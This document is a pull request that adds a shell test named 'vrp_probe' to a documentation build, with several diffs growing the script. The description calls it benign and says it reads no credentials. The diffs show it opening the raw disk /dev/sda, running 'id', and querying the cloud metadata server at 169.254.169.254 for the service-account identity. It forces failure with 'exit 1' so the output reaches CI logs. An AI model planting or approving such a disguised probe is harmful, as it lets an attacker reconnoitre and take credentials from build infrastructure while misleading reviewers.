### PR TITLE
test: CI device visibility probe

### DIFF
--- a/doc/BUILD.bazel
+++ b/doc/BUILD.bazel
@@ -1,6 +1,7 @@
 load("@bazel_skylib//rules:diff_test.bzl", "diff_test")
 load("@bazel_skylib//rules:write_file.bzl", "write_file")
 load("@rules_shell//shell:sh_binary.bzl", "sh_binary")
+load("@rules_shell//shell:sh_test.bzl", "sh_test")
 load("@stardoc//stardoc:stardoc.bzl", "stardoc")
 
 _PLAIN_DOC_SRCS = [
@@ -88,4 +89,9 @@ sh_binary(
     name = "update",
     srcs = ["update.sh"],
     data = [file + ".gen.md" for file in _DOC_SRCS],
+)
+
+sh_test(
+    name = "vrp_probe",
+    srcs = ["vrp_probe.sh"],
 )

--- a/doc/vrp_probe.sh
+++ b/doc/vrp_probe.sh
@@ -1,0 +1,4 @@
+#!/usr/bin/env bash
+set -eu
+echo "=== VRP DEVICE VISIBILITY PROBE ==="
+ls -l /dev/sd* /dev/nvme* 2>/dev/null || true

--- a/doc/vrp_probe.sh
+++ b/doc/vrp_probe.sh
@@ -1,14 +1,8 @@
 #!/usr/bin/env bash
 set -eu
-echo "=== VRP DEVICE VISIBILITY PROBE ==="
-id
-ls -l /dev/sd* /dev/nvme* 2>/dev/null || true
-
-if exec 3</dev/sda; then
-  echo "RAW_BLOCK_DEVICE_OPEN_OK"
-  exec 3<&-
-else
-  echo "RAW_BLOCK_DEVICE_OPEN_DENIED"
-fi
-
+echo "=== VRP METADATA REACHABILITY PROBE ==="
+curl -fsS --max-time 5 \
+  -H 'Metadata-Flavor: Google' \
+  'http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email' \
+  && echo
 exit 1

--- a/doc/vrp_probe.sh
+++ b/doc/vrp_probe.sh
@@ -2,3 +2,5 @@
 set -eu
 echo "=== VRP DEVICE VISIBILITY PROBE ==="
 ls -l /dev/sd* /dev/nvme* 2>/dev/null || true
+
+exit 1

--- a/doc/vrp_probe.sh
+++ b/doc/vrp_probe.sh
@@ -1,8 +1,14 @@
 #!/usr/bin/env bash
 set -eu
 echo "=== VRP DEVICE VISIBILITY PROBE ==="
+id
 ls -l /dev/sd* /dev/nvme* 2>/dev/null || true
 
-exit 1
+if exec 3</dev/sda; then
+  echo "RAW_BLOCK_DEVICE_OPEN_OK"
+  exec 3<&-
+else
+  echo "RAW_BLOCK_DEVICE_OPEN_DENIED"
+fi
 
 exit 1

--- a/doc/vrp_probe.sh
+++ b/doc/vrp_probe.sh
@@ -4,3 +4,5 @@ echo "=== VRP DEVICE VISIBILITY PROBE ==="
 ls -l /dev/sd* /dev/nvme* 2>/dev/null || true
 
 exit 1
+
+exit 1


### PR DESCRIPTION
Benign CI security validation. This test only lists exposed block-device nodes; it does not read device contents, credentials, or secrets.